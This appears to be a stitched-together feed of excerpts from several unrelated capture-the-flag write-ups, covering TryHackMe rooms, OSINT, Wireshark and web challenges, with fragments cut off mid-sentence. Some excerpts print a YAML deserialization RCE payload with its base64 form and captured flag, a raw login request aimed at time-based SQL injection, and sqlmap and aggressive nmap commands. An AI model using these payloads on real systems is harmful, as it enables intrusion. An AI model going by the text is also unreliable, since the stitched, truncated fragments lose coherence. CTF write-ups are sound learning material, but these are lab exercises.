Hey folks welcome to my blog. In this blog, I’ll be presenting the write-up for a TryHackMe room called Internal. This room is rated as hard in terms of difficulty and serves as a penetration testing box.
Reconnaissance Scanning First things first, let’s begin by running a Nmap scan on the provided IP address.
Nmap nmap -A -p- 10.10.123.64 -oN nmap/aggresive-scan-all-ports -T4 # Nmap 7.80 scan initiated Tue Apr 2 23:25:47 2024 as: nmap -A -p- -oN nmap/aggresive-scan-all-ports -T4 10.
Hello, everyone! In this article, I’ll walk you through a TryHackMe room called Startup. This room is designed for beginners, testing your skills in web exploitation, FTP access, remote code execution, and, ultimately, gaining root access through a basic cronjob privilege escalation. Get ready to tackle this beginner-friendly challenge and learn as you progress. Let’s dive in!
Reconnaissence Scanning Nmap scan Let’s start with an aggresive -A Nmap scan on all ports -p-.
Hey amigos, I participated in WinjaCTF Nullcon Goa 2023 online and solved some OSINT and web challenges. However, I could only solve two challenges in the OSINT category. In this article, I’m going to demonstrate how I solved these OSINT challenges.
Memento Pts: 100
Challenge Description Megan, who tends to be forgetful, embarked on a journey to an unfamiliar destination. While capturing memories through photographs, she encountered an unfortunate incident where one of her pictures became distorted.
Hey there in this writeup I’ll be sharing solutions for challenges in the networking category of BDSec CTF 2023. If you’re interested in learning the fundamentals of Wireshark and network traffic analysis, you’re in the right place. If you are new to wireshark and network traffic analysis please checkout my previous article 👇.
Continue reading to explore the challenge solutions and enhance your Wireshark skills
To follow along, you can download the challenge file attached below 👇 Download: challenge.
Hijack It shows Serialized config.
www.base64decode.org It is using python as it’s backend, and some kind of serialization.
By google search i found this blog
!!python/object/apply:os.system ["cat flag.txt"] Encode this rce payload in base64
ISFweXRob24vb2JqZWN0L2FwcGx5Om9zLnN5c3RlbSBbImNhdCBmbGFnLnR4dCJdCg== Flag: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}
Restricted From docker file I found that flag is beind renamed with some random strings with flag_ prefix in root directory
So our flag will look like flag_t04P0
There is restricted commands,so to list available commands use compgen -ac
Orbital Visit the IP address and we see a login panel.
login panel Manual sqli didn’t worked,so i saved the post request into a file.
request.txt:
POST http://64.227.41.83:30772/api/login HTTP/1.1 Host: 64.227.41.83:30772 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://64.227.41.83:30772/ Content-Type: application/json Origin: http://64.227.41.83:30772 Content-Length: 37 Connection: close {"username":"admin","password":"admin"} And using sqlmap, I Found timebased SQLi in username parameter.
Command:
ryuk@kali:~# sqlmap -r request.